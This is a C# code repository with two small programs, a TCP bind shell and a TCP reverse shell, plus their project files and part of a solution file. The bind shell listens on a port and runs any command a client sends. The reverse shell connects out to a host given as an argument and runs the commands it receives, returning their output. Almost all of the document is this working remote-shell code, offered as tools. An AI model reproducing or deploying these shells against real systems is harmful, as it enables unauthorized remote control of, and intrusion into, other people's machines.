129 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM64.ActiveCfg = Release|Any CPU
130 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM64.Build.0 = Release|Any CPU
131 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x64.ActiveCfg = Release|Any CPU
132 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x64.Build.0 = Release|Any CPU
133 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x86.ActiveCfg = Release|Any CPU
134 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x86.Build.0 = Release|Any CPU
135 | EndGlobalSection
136 | GlobalSection(SolutionProperties) = preSolution
137 | HideSolutionNode = FALSE
138 | EndGlobalSection
139 | GlobalSection(ExtensibilityGlobals) = postSolution
140 | SolutionGuid = {DDEFD2C2-893D-4A55-B6A1-6FC75809ECC4}
141 | EndGlobalSection
142 | EndGlobal
143 |
--------------------------------------------------------------------------------
/TCP Bind Shell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Net.Sockets;
4 | using System.IO;
5 | using System.Linq;
6 | using System.Diagnostics;
7 |
8 | class Program {
9 | static void Main(string[] args) {
10 | IPAddress host = IPAddress.Any;
11 | int port;
12 | if (args.Length < 1) {
13 | throw new ArgumentException("Usage: application [] ");
14 | }
15 |
16 | // parsing arguments
17 | if (args.Length == 1) {
18 | port = Convert.ToInt32(args[0]);
19 | } else {
20 | port = Convert.ToInt32(args[1]);
21 | host = IPAddress.Parse(args[0]);
22 | }
23 |
24 | // creating the server and listening on the port
25 | var server = new TcpListener(host, port);
26 | server.Start();
27 |
28 | while (true) {
29 | // accepting connection as tcp client
30 | using (var client = server.AcceptTcpClient()) {
31 | // get client ip address and port number
32 | string clientAddr = client.Client.RemoteEndPoint.ToString();
33 |
34 | Console.WriteLine("[+] Client Connected: {0}", clientAddr);
35 |
36 | // get streams
37 | var stream = client.GetStream();
38 | var wr = new StreamWriter(stream) { AutoFlush = true };
39 | var rd = new StreamReader(stream);
40 |
41 | Console.WriteLine("[+] Start Reading Inputs");
42 |
43 | while (true) {
44 | // seding the banner and prompt
45 | wr.Write(string.Format("{0}@{1} $ ", Environment.UserName, Environment.MachineName));
46 |
47 | // skip when input is emptpy, null or whitespace
48 | // exit if cmd is sent to be exit
49 | var cmd = rd.ReadLine().Trim().ToLower();
50 | if (string.IsNullOrEmpty(cmd) || string.IsNullOrWhiteSpace(cmd)) {
51 | continue;
52 | } else if (cmd == "exit") {
53 | break;
54 | }
55 |
56 | // preprocess command line recievided from client
57 | string[] parts = cmd.Split(' ');
58 | string fileName = parts.First();
59 | string cmdArgs = string.Join(' ', parts.Skip(1).ToArray());
60 |
61 | // instantiate process
62 | Process process = new Process() {
63 | StartInfo = new ProcessStartInfo(fileName, cmdArgs) {
64 | UseShellExecute = false,
65 | RedirectStandardOutput = true,
66 | RedirectStandardError = true
67 | }
68 | };
69 |
70 | // spawn process and return output
71 | try {
72 | process.Start();
73 | process.StandardOutput.BaseStream.CopyTo(stream);
74 | process.StandardError.BaseStream.CopyTo(stream);
75 | process.WaitForExit();
76 | Console.WriteLine("[+] Executed '{0}'", cmd);
77 | } catch (Exception e) {
78 | wr.WriteLine(e.Message);
79 | Console.WriteLine("[x] Failed to Execute '{0}'", cmd);
80 | }
81 | }
82 |
83 | Console.WriteLine("[+] Releasing Resources for {0}", clientAddr);
84 | // closing other stream
85 | rd.Close();
86 | wr.Close();
87 | stream.Close();
88 | }
89 | }
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/TCP Bind Shell/TCP Bind Shell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | TCP_Bind_Shell
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/TCP Reverse Shell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net.Sockets;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Diagnostics;
6 | using System.Text;
7 |
8 | class Program {
9 | static void Main(string[] args) {
10 | if (args.Length < 2) {
11 | throw new ArgumentException("Usage: executable host-to-connect port-number");
12 | }
13 |
14 | using (var tcp = new TcpClient()) {
15 | // connect to the tcp server
16 | Console.WriteLine("[+] Connecting to tcp://{0}:{1}", args[0], args[1]);
17 | tcp.Connect(args[0], Convert.ToInt32(args[1]));
18 |
19 | // get tcp stream
20 | // this is used to send / recieve data
21 | Console.WriteLine("[!] Getting base stream");
22 | using (var stream = tcp.GetStream()) {
23 | // specifically getting reader stream
24 | // this is a higher api encapsulating the low level stream function and provide more functionality
25 | Console.WriteLine("[!] Creating stream reader from base stream");
26 | using (var rdr = new StreamReader(stream)) {
27 | while (true) {
28 | var prompt = Encoding.ASCII.GetBytes(string.Format("{0}@{1} $ ", Environment.UserName, Environment.MachineName));
29 | stream.Write(prompt, 0, prompt.Length);
30 |
31 | // wait for the text from server
32 | string cmd = rdr.ReadLine().Trim().ToLower();
33 |
34 | // safeguard user input
35 | if (cmd == "exit") {
36 | break;
37 | } else if (string.IsNullOrEmpty(cmd) || string.IsNullOrWhiteSpace(cmd)) {
38 | continue;
39 | }
40 |
41 | // get file name to execute
42 | // and its arguments
43 | string[] parts = cmd.Split(' ');
44 | string fileName = parts.First();
45 | string[] fileArgs = parts.Skip(1).ToArray();
46 |
47 | Console.WriteLine("[+] Executing '{0}'", cmd);
48 |
49 | // instantiate process
50 | var process = new Process {
51 | StartInfo = new ProcessStartInfo {
52 | FileName = fileName,
53 | Arguments = string.Join(" ", fileArgs),
54 | UseShellExecute = false,
55 | RedirectStandardError = true,
56 | RedirectStandardOutput = true,
57 |
58 | }
59 | };
60 |
61 | // start process and handle IO
62 | try {
63 | process.Start();
64 |
65 | // copying the stderr and stdout to network stream
66 | process.StandardOutput.BaseStream.CopyTo(stream);
67 | process.StandardError.BaseStream.CopyTo(stream);
68 |
69 | process.WaitForExit();
70 | } catch (Exception e) {
71 | Console.WriteLine("[x] Error executing '{0}'", cmd);
72 | var message = Encoding.ASCII.GetBytes(e.Message + "\r\n");
73 | stream.Write(message, 0, message.Length);
74 | }
75 |
76 |
77 | }
78 |
79 | // close the reader stream
80 | Console.WriteLine("[!] Closing the reader stream");
81 | rdr.Close();
82 | }
83 |
84 | // close the base stream
85 | Console.WriteLine("[!] Closing the base stream");
86 | stream.Close();
87 | }
88 |
89 | // close the tcp connection
90 | Console.WriteLine("[+] Closing TCP Connection");
91 | tcp.Close();
92 | }
93 | }
94 | }
95 |
--------------------------------------------------------------------------------
/TCP Reverse Shell/TCP Reverse Shell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | TCP_Reverse_Shell
7 | false
8 | AnyCPU;ARM32;ARM64;x64;x86
9 |
10 |
11 |
12 | Off
13 | false
14 | bin\Debug
15 |
16 |
17 |
18 | bin\Release
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------